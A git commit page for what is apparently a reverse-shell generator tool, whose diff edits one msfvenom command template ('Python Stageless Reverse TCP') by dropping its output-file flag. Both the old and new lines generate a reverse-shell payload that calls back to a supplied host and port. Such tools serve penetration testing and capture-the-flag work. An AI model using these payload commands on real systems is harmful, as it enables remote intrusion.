Update data.js

Fix the Python Stageless Reverse TCP output file extension error

https://github.com/0dayCTF/reverse-shell-generator/issues/96
This commit is contained in:
Alvin Smith 2022-10-11 13:01:00 +13:00 committed by GitHub
parent 63978e4b9e
commit 7b86264ecd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -440,7 +440,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "Python Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py",
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{